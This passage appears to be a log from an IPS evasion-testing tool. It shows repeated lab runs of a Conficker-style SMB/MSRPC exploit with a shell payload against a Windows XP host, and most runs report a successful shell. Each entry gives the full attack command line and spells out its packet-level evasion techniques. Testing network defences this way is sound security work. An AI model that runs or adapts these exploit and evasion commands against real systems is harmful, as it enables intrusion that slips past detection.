- Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload

Info: NetBIOS connection 10.62.90.112:59721 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
..................
27628 runs averaging 1.76 runs / second ; progress: 15660/43200..................
27646 runs averaging 1.76 runs / second ; progress: 15665/43200.........
27655 runs averaging 1.76 runs / second ; progress: 15670/43200.2015-11-29 18:47:01 INFO
Success. (10.62.90.117):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33922 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=GNVZQxmNpFE --evasion=[msrpc_bind,end]smb_decoytrees,"3","4","1","random_msrpcbind" --evasion=[msrpc_bind,msrpc_req]smb_seg,"7" --verifydelay=1000 --payload=shell
Info: Using random seed GNVZQxmNpFE
The following evasions are applied from stage msrpc_bind to end:
- Before normal SMB writes, 3 SMB trees are opened and 4 writes are performed to them. The write payload is 1 bytes of MSRPC bind-like data.
The following evasions are applied from stage msrpc_bind to msrpc_req:
- SMB writes are segmented to contain at most 7 bytes of payload.

Info: NetBIOS connection 10.62.90.117:33922 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Command shell connection reset.
Info: CommandShell::SendCommand() - Failed to send string
Info: Shell closed
0: Success.
.......
27664 runs averaging 1.76 runs / second ; progress: 15675/43200............
27676 runs averaging 1.77 runs / second ; progress: 15680/43200.........
27685 runs averaging 1.77 runs / second ; progress: 15685/43200......2015-11-29 18:47:18 INFO
Success. (10.62.90.117):
/root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=23932 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=eZYvNY6iczk --evasion=[smb_connect,smb_openpipe]smb_writeandxpad,"858","random" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"50%","4","alpharandomized" --verifydelay=1000 --payload=shell
Info: Using random seed eZYvNY6iczl
The following evasions are applied from stage smb_connect to smb_openpipe:
- 858 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random bytes.
The following evasions are applied from stage smb_openpipe to msrpc_req:
- 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has original payload with alphabetic bytes randomized

Info: NetBIOS connection 10.62.90.117:23932 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
  768. ....
  769. 27696 runs averaging 1.77 runs / second ; progress: 15690/43200.Pid 956 timed out - killed
  770. 2015-11-29 18:47:21 INFO
  771. Timed out (10.62.90.111):
  772. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55909 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=tnVOfG/VLwU --evasion=[smb_connect,msrpc_req]smb_decoytrees,"3","2","973","random_msrpcreq" --evasion=[smb_openpipe,end]tcp_urgent,"5","random" --verifydelay=1000 --payload=shell
  773. Info: Using random seed tnVOfG/VLwW
  774. The following evasions are applied from stage smb_connect to msrpc_req:
  775. - Before normal SMB writes, 3 SMB trees are opened and 2 writes are performed to them. The write payload is 973 bytes of MSRPC request-like data.
  776. The following evasions are applied from stage smb_openpipe to end:
  777. - Add a random urgent data byte to every 5 TCP segment.
  778.  
  779. Info: NetBIOS connection 10.62.90.111:55909 -> 10.35.1.207:445
  780. Terminated
  781. ...............
  782. 27713 runs averaging 1.77 runs / second ; progress: 15695/43200..........
  783. 27723 runs averaging 1.77 runs / second ; progress: 15700/43200.............
  784. 27736 runs averaging 1.77 runs / second ; progress: 15705/43200......Pid 1391 timed out - killed
  785. 2015-11-29 18:47:38 INFO
  786. Timed out (10.62.90.110):
  787. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29321 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=AzPJyM0KsdE --evasion=[smb_opentree,msrpc_bind]netbios_chaff,"5","empty_keepalive|small_unspec|http_get|msrpc_req" --evasion=[smb_connect,end]tcp_urgent,"25%","random_alpha" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
  788. Info: Using random seed AzPJyM0KsdE
  789. The following evasions are applied from stage smb_connect to end:
  790. - 25% probability to add a random alphaurgent data byte to a TCP segment.
  791. The following evasions are applied from stage smb_opentree to msrpc_req:
  792. - Add a zero urgent data byte to every 2 TCP segment.
  793. The following evasions are applied from stage smb_opentree to msrpc_bind:
  794. - Before every 5th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
  795.  
  796. Info: NetBIOS connection 10.62.90.110:29321 -> 10.35.1.207:445
  797. Terminated
  798. ..........
  799. 27753 runs averaging 1.77 runs / second ; progress: 15710/43200.............
  800. 27766 runs averaging 1.77 runs / second ; progress: 15715/43200...Pid 1432 timed out - killed
  801. 2015-11-29 18:47:49 INFO
  802. Timed out (10.62.90.113):
  803. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=12055 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=xV8Qwg+e8qU --evasion=[smb_openpipe,msrpc_bind]netbios_chaff,"13","small_unspec|http_post" --evasion=[smb_openpipe,end]tcp_paws,"75%","1","random_alphanum" --verifydelay=1000 --payload=shell
  804. Info: Using random seed xV8Qwg+e8qX
  805. The following evasions are applied from stage smb_openpipe to end:
  806. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 1> and has random alphanumeric bytes as payload
  807. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  808. - Before every 13th actual NetBIOS message a chaff message is sent. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload.
  809.  
  810. Info: NetBIOS connection 10.62.90.113:12055 -> 10.35.1.207:445
  811. Terminated
  812. .
  813. 27771 runs averaging 1.77 runs / second ; progress: 15720/43200.
  814. 27772 runs averaging 1.77 runs / second ; progress: 15725/43200....2015-11-29 18:47:59 INFO
  815. Success. (10.62.90.117):
  816. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51361 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=9FEgSgu5vcw --evasion=[smb_openpipe,msrpc_req]smb_decoytrees,"2","2","3","random" --evasion=[smb_opentree,end]tcp_paws,"5","8","random_alphanum" --verifydelay=1000 --payload=shell
  817. Info: Using random seed 9FEgSgu5vcz
  818. The following evasions are applied from stage smb_opentree to end:
  819. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alphanumeric bytes as payload
  820. The following evasions are applied from stage smb_openpipe to msrpc_req:
  821. - Before normal SMB writes, 2 SMB trees are opened and 2 writes are performed to them. The write payload is 3 random bytes.
  822.  
  823. Info: NetBIOS connection 10.62.90.117:51361 -> 10.35.1.207:445
  824. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  825. Info: Sending MSRPC request with exploit
  826. Info: Shell found, attack succeeded
  827. Info: Shell closed
  828. 0: Success.
  829. .....
  830. 27782 runs averaging 1.77 runs / second ; progress: 15730/43200....................
  831. 27802 runs averaging 1.77 runs / second ; progress: 15735/43200...................2015-11-29 18:48:09 INFO
  832. Success. (10.62.90.111):
  833. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58603 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=zQrV9wU4W2Q --evasion=[smb_connect,end]smb_decoytrees,"2","6","2","random_msrpcreq" --evasion=[smb_openpipe,end]tcp_overlap,"774","new","random_alphanum" --verifydelay=1000 --payload=shell
  834. Info: Using random seed zQrV9wU4W2T
  835. The following evasions are applied from stage smb_connect to end:
  836. - Before normal SMB writes, 2 SMB trees are opened and 6 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
  837. The following evasions are applied from stage smb_openpipe to end:
  838. - TCP segments are set to overlap by 774 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
  839.  
  840. Info: NetBIOS connection 10.62.90.111:58603 -> 10.35.1.207:445
  841. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  842. Info: Sending MSRPC request with exploit
  843. Info: Shell found, attack succeeded
  844. Info: Shell closed
  845. 0: Success.
  846. ...
  847. 27825 runs averaging 1.77 runs / second ; progress: 15740/43200.2015-11-29 18:48:11 INFO
  848. Success. (10.62.90.113):
  849. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58902 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=GGyhVeoye7M --evasion=[smb_connect,msrpc_bind]tcp_chaff,"3","chksum|nullflag|outofwindow|shorthdr|longhdr","zero" --evasion=[start,end]tcp_paws,"3","36687720","alpharandomized" --verifydelay=1000 --payload=shell
  850. Info: Using random seed GGyhVeoye7M
  851. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 36687720> and has original payload with alphabetic bytes randomized
  852. The following evasions are applied from stage smb_connect to msrpc_bind:
  853. - With every 3 TCP packet a TCP chaff packet is sent. The chaff packet has:
  854. * Invalid TCP checksum.
  855. * NULL TCP control flags.
  856. * An out-of-window sequence number.
  857. * TCP header shorter than 20 bytes
  858. * TCP header longer than packet total size
  859. * Duplicate packet has 0x00 bytes as payload
  860.  
  861. Info: NetBIOS connection 10.62.90.113:58902 -> 10.35.1.207:445
  862. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  863. Info: Sending MSRPC request with exploit
  864. Info: Shell found, attack succeeded
  865. Info: Shell closed
  866. 0: Success.
  867. .........
  868. 27836 runs averaging 1.77 runs / second ; progress: 15745/43200......
  869. 27842 runs averaging 1.77 runs / second ; progress: 15750/43200.2015-11-29 18:48:22 INFO
  870. Success. (10.62.90.110):
  871. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62003 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=6hxXZxV/TQc --evasion=[netbios_connect,smb_opentree]tcp_chaff,"21","outofwindow|longhdr","shuffle" --evasion=[start,msrpc_req]tcp_paws,"50%","257032956","alpharandomized" --verifydelay=1000 --payload=shell
  872. Info: Using random seed 6hxXZxV/TQf
  873. The following evasions are applied from stage start to msrpc_req:
  874. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 257032956> and has original payload with alphabetic bytes randomized
  875. The following evasions are applied from stage netbios_connect to smb_opentree:
  876. - With every 21 TCP packet a TCP chaff packet is sent. The chaff packet has:
  877. * An out-of-window sequence number.
  878. * TCP header longer than packet total size
  879. * Duplicate packet has shuffled original payload
  880.  
  881. Info: NetBIOS connection 10.62.90.110:62003 -> 10.35.1.207:445
  882. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  883. Info: Sending MSRPC request with exploit
  884. Info: Shell found, attack succeeded
  885. Info: CommandShell::SendCommand() - Failed to send string
  886. Info: Command shell connection reset.
  887. Info: Shell closed
  888. 0: Success.
  889. ..........
  890. 27854 runs averaging 1.77 runs / second ; progress: 15755/43200..........
  891. 27864 runs averaging 1.77 runs / second ; progress: 15760/43200.........
  892. 27873 runs averaging 1.77 runs / second ; progress: 15765/43200......2015-11-29 18:48:39 INFO
  893. Success. (10.62.90.113):
  894. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17936 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=4nL4a4IvLH0 --evasion=[netbios_connect,msrpc_req]tcp_paws,"1","3","random_alphanum" --evasion=[smb_connect,smb_openpipe]tcp_seg,"9" --verifydelay=1000 --payload=shell
  895. Info: Using random seed 4nL4a4IvLH3
  896. The following evasions are applied from stage netbios_connect to msrpc_req:
  897. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alphanumeric bytes as payload
  898. The following evasions are applied from stage smb_connect to smb_openpipe:
  899. - TCP packets are segmented to contain at most 9 bytes of payload.
  900.  
  901. Info: NetBIOS connection 10.62.90.113:17936 -> 10.35.1.207:445
  902. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  903. Info: Sending MSRPC request with exploit
  904. Info: Shell found, attack succeeded
  905. Info: Shell closed
  906. 0: Success.
  907. ....
  908. 27884 runs averaging 1.77 runs / second ; progress: 15770/43200.............
  909. 27897 runs averaging 1.77 runs / second ; progress: 15775/43200...................
  910. 27916 runs averaging 1.77 runs / second ; progress: 15780/43200......2015-11-29 18:48:54 INFO
  911. Success. (10.62.90.117):
  912. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=10147 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=QPbox6bWoBI --evasion=[smb_connect,end]tcp_overlap,"1479","new","random" --evasion=[netbios_connect,end]tcp_paws,"25%","215976190","alpharandomized" --verifydelay=1000 --payload=shell
  913. Info: Using random seed QPbox6bWoBJ
  914. The following evasions are applied from stage netbios_connect to end:
  915. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 215976190> and has original payload with alphabetic bytes randomized
  916. The following evasions are applied from stage smb_connect to end:
  917. - TCP segments are set to overlap by 1479 bytes, with the later packet containing the correct payload. Overlapping part has random bytes as payload
  918.  
  919. Info: NetBIOS connection 10.62.90.117:10147 -> 10.35.1.207:445
  920. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  921. Info: Sending MSRPC request with exploit
  922. Info: Shell found, attack succeeded
  923. Info: CommandShell::SendCommand() - Failed to send string
  924. Info: Command shell connection reset.
  925. Info: Shell closed
  926. 0: Success.
  927. ..
  928. 27925 runs averaging 1.77 runs / second ; progress: 15785/43200....2015-11-29 18:48:58 INFO
  929. Success. (10.62.90.117):
  930. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52189 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=4Fl3WpOMNK8 --evasion=[start,msrpc_req]tcp_paws,"75%","6","alphanumrandomized" --evasion=[msrpc_req,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  931. Info: Using random seed 4Fl3WpOMNK/
  932. The following evasions are applied from stage start to msrpc_req:
  933. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphanumeric bytes randomized
  934. The following evasions are applied from stage msrpc_req to end:
  935. - TCP timestamps echo reply value is sent in the wrong endianness
  936.  
  937. Info: NetBIOS connection 10.62.90.117:52189 -> 10.35.1.207:445
  938. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  939. Info: Sending MSRPC request with exploit
  940. Info: Shell found, attack succeeded
  941. Info: Shell closed
  942. 0: Success.
  943. .....2015-11-29 18:49:00 INFO
  944. Success. (10.62.90.117):
  945. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56280 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=JDm6ToN1zLk --evasion=[smb_connect,end]tcp_paws,"1","3","alphanumrandomized" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"50%","117704364","shuffle" --evasion=[netbios_connect,end]tcp_recv_window,"7" --verifydelay=1000 --payload=shell
  946. Info: Using random seed JDm6ToN1zLk
  947. The following evasions are applied from stage netbios_connect to end:
  948. - TCP receive window is set to at most 7 bytes.
  949. The following evasions are applied from stage smb_connect to end:
  950. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has original payload with alphanumeric bytes randomized
  951. The following evasions are applied from stage smb_openpipe to msrpc_req:
  952. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 117704364> and has shuffled original payload
  953.  
  954. Info: NetBIOS connection 10.62.90.117:56280 -> 10.35.1.207:445
  955. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  956. Info: Sending MSRPC request with exploit
  957. Info: Shell found, attack succeeded
  958. Info: Shell closed
  959. 0: Success.
  960. ..
  961. 27938 runs averaging 1.77 runs / second ; progress: 15790/43200................
  962. 27954 runs averaging 1.77 runs / second ; progress: 15796/43200..........
  963. 27964 runs averaging 1.77 runs / second ; progress: 15801/43200..
  964. 27966 runs averaging 1.77 runs / second ; progress: 15806/43200
  965. 27966 runs averaging 1.77 runs / second ; progress: 15811/43200........
  966. 27974 runs averaging 1.77 runs / second ; progress: 15816/43200......2015-11-29 18:49:31 INFO
  967. Success. (10.62.90.112):
  968. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34127 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=EwCILbJtpug --evasion=[start,smb_openpipe]ipv4_opt,"13","inc","random_alphanum" --evasion=[smb_opentree,end]tcp_paws,"50%","101597375","random_alpha" --verifydelay=1000 --payload=shell
  969. Info: Using random seed EwCILbJtpug
  970. The following evasions are applied from stage start to smb_openpipe:
  971. - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  972. The duplicate packet has random alphanumeric bytes as payload
  973. The following evasions are applied from stage smb_opentree to end:
  974. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 101597375> and has random alpha bytes as payload
  975.  
  976. Info: NetBIOS connection 10.62.90.112:34127 -> 10.35.1.207:445
  977. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  978. Info: Sending MSRPC request with exploit
  979. Info: Shell found, attack succeeded
  980. Info: CommandShell::SendCommand() - Failed to send string
  981. Info: Command shell connection reset.
  982. Info: Shell closed
  983. 0: Success.
  984.  
  985. 27981 runs averaging 1.77 runs / second ; progress: 15821/43200..
  986. 27983 runs averaging 1.77 runs / second ; progress: 15826/43200...
  987. 27986 runs averaging 1.77 runs / second ; progress: 15831/43200.......
  988. 27993 runs averaging 1.77 runs / second ; progress: 15836/43200.............2015-11-29 18:49:51 INFO
  989. Success. (10.62.90.110):
  990. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56329 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=xqffTOxhPHs --evasion=[smb_opentree,smb_openpipe]tcp_chaff,"21","chksum|nullchksum|outofwindow","shuffle30" --evasion=[smb_opentree,end]tcp_paws,"3","268435455","random" --verifydelay=1000 --payload=shell
  991. Info: Using random seed xqffTOxhPHv
  992. The following evasions are applied from stage smb_opentree to smb_openpipe:
  993. - With every 21 TCP packet a TCP chaff packet is sent. The chaff packet has:
  994. * Invalid TCP checksum.
  995. * NULL TCP checksum.
  996. * An out-of-window sequence number.
  997. * Duplicate packet has 30 bytes of original payload, then shuffled original payload
  998. The following evasions are applied from stage smb_opentree to end:
  999. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random bytes as payload
  1000.  
  1001. Info: NetBIOS connection 10.62.90.110:56329 -> 10.35.1.207:445
  1002. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1003. Info: Sending MSRPC request with exploit
  1004. Info: Shell found, attack succeeded
  1005. Info: Shell closed
  1006. 0: Success.
  1007. .
  1008. 28008 runs averaging 1.77 runs / second ; progress: 15841/43200...2015-11-29 18:49:52 INFO
  1009. Success. (10.62.90.110):
  1010. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18237 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=6JjWlAliJfs --evasion=[netbios_connect,smb_connect]netbios_chaff,"50%","http_post" --evasion=[msrpc_bind,end]tcp_paws,"1","268435453","alpharandomized" --verifydelay=1000 --payload=shell
  1011. Info: Using random seed 6JjWlAliJfv
  1012. The following evasions are applied from stage netbios_connect to smb_connect:
  1013. - 50% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload.
  1014. The following evasions are applied from stage msrpc_bind to end:
  1015. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has original payload with alphabetic bytes randomized
  1016.  
  1017. Info: NetBIOS connection 10.62.90.110:18237 -> 10.35.1.207:445
  1018. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1019. Info: Sending MSRPC request with exploit
  1020. Info: Shell found, attack succeeded
  1021. Info: Shell closed
  1022. 0: Success.
  1023. .....2015-11-29 18:49:54 INFO
  1024. Success. (10.62.90.117):
  1025. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49837 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=QkN3JKTYqig --evasion=[start,msrpc_req]tcp_paws,"2","3","alphanumrandomized" --evasion=[netbios_connect,smb_opentree]tcp_paws,"1","9","alphanumrandomized" --verifydelay=1000 --payload=shell
  1026. Info: Using random seed QkN3JKTYqih
  1027. The following evasions are applied from stage start to msrpc_req:
  1028. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has original payload with alphanumeric bytes randomized
  1029. The following evasions are applied from stage netbios_connect to smb_opentree:
  1030. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has original payload with alphanumeric bytes randomized
  1031.  
  1032. Info: NetBIOS connection 10.62.90.117:49837 -> 10.35.1.207:445
  1033. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1034. Info: Sending MSRPC request with exploit
  1035. Info: Shell found, attack succeeded
  1036. Info: Shell closed
  1037. 0: Success.
  1038. .......
  1039. 28025 runs averaging 1.77 runs / second ; progress: 15846/43200.............
  1040. 28038 runs averaging 1.77 runs / second ; progress: 15851/43200...........
  1041. 28049 runs averaging 1.77 runs / second ; progress: 15856/43200..........
  1042. 28059 runs averaging 1.77 runs / second ; progress: 15861/43200.........
  1043. 28068 runs averaging 1.77 runs / second ; progress: 15866/43200..
  1044. 28070 runs averaging 1.77 runs / second ; progress: 15871/43200
  1045. 28070 runs averaging 1.77 runs / second ; progress: 15876/43200Pid 5217 timed out - killed
  1046. 2015-11-29 18:50:28 INFO
  1047. Timed out (10.62.90.115):
  1048. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=19081 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=iIUPNOtp5Ls --evasion=[smb_connect,end]tcp_chaff,"13","longhdr","random" --evasion=[smb_openpipe,end]tcp_urgent,"1","random" --verifydelay=1000 --payload=shell
  1049. Info: Using random seed iIUPNOtp5Lu
  1050. The following evasions are applied from stage smb_connect to end:
  1051. - With every 13 TCP packet a TCP chaff packet is sent. The chaff packet has:
  1052. * TCP header longer than packet total size
  1053. * Duplicate packet has random bytes as payload
  1054. The following evasions are applied from stage smb_openpipe to end:
  1055. - Add a random urgent data byte to every 1 TCP segment.
  1056.  
  1057. Info: NetBIOS connection 10.62.90.115:19081 -> 10.35.1.207:445
  1058. Terminated
  1059.  
  1060. 28071 runs averaging 1.77 runs / second ; progress: 15881/43200.....
  1061. 28076 runs averaging 1.77 runs / second ; progress: 15886/43200.....
  1062. 28081 runs averaging 1.77 runs / second ; progress: 15891/43200......2015-11-29 18:50:45 INFO
  1063. Success. (10.62.90.110):
  1064. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=50648 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=f19n/w1BjR8 --evasion=[smb_openpipe,msrpc_bind]smb_decoytrees,"4","5","2047","random" --evasion=[msrpc_bind,end]tcp_paws,"1","33510158","random_alpha" --verifydelay=1000 --payload=shell
  1065. Info: Using random seed f19n/w1BjR9
  1066. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  1067. - Before normal SMB writes, 4 SMB trees are opened and 5 writes are performed to them. The write payload is 2047 random bytes.
  1068. The following evasions are applied from stage msrpc_bind to end:
  1069. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 33510158> and has random alpha bytes as payload
  1070.  
  1071. Info: NetBIOS connection 10.62.90.110:50648 -> 10.35.1.207:445
  1072. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1073. Info: Sending MSRPC request with exploit
  1074. Info: Shell found, attack succeeded
  1075. Info: Shell closed
  1076. 0: Success.
  1077. ..
  1078. 28090 runs averaging 1.77 runs / second ; progress: 15896/432002015-11-29 18:50:51 INFO
  1079. Success. (10.62.90.110):
  1080. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26041 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=sl7m0GwAntw --evasion=[smb_connect,msrpc_bind]ipv4_opt,"5","inc","random_alphanum" --evasion=[smb_connect,msrpc_req]smb_decoytrees,"6","2","7","random_msrpcreq" --evasion=[smb_openpipe,msrpc_req]smb_decoytrees,"6","5","4","random" --verifydelay=1000 --payload=shell
  1081. Info: Using random seed sl7m0GwAnty
  1082. The following evasions are applied from stage smb_connect to msrpc_bind:
  1083. - Every 5th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  1084. The duplicate packet has random alphanumeric bytes as payload
  1085. The following evasions are applied from stage smb_connect to msrpc_req:
  1086. - Before normal SMB writes, 6 SMB trees are opened and 2 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.
  1087. The following evasions are applied from stage smb_openpipe to msrpc_req:
  1088. - Before normal SMB writes, 6 SMB trees are opened and 5 writes are performed to them. The write payload is 4 random bytes.
  1089.  
  1090. Info: NetBIOS connection 10.62.90.110:26041 -> 10.35.1.207:445
  1091. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1092. Info: Sending MSRPC request with exploit
  1093. Info: Shell found, attack succeeded
  1094. Info: CommandShell::SendCommand() - Failed to send string
  1095. Info: Command shell connection reset.
  1096. Info: Shell closed
  1097. 0: Success.
  1098.  
  1099. 28091 runs averaging 1.77 runs / second ; progress: 15901/43200.....
  1100. 28096 runs averaging 1.77 runs / second ; progress: 15906/43200.......
  1101. 28103 runs averaging 1.77 runs / second ; progress: 15911/43200........
  1102. 28111 runs averaging 1.77 runs / second ; progress: 15916/43200
  1103. 28111 runs averaging 1.77 runs / second ; progress: 15921/43200
  1104. 28111 runs averaging 1.77 runs / second ; progress: 15926/43200...
  1105. 28114 runs averaging 1.76 runs / second ; progress: 15931/43200....
  1106. 28118 runs averaging 1.76 runs / second ; progress: 15936/43200...2015-11-29 18:51:31 INFO
  1107. Success. (10.62.90.110):
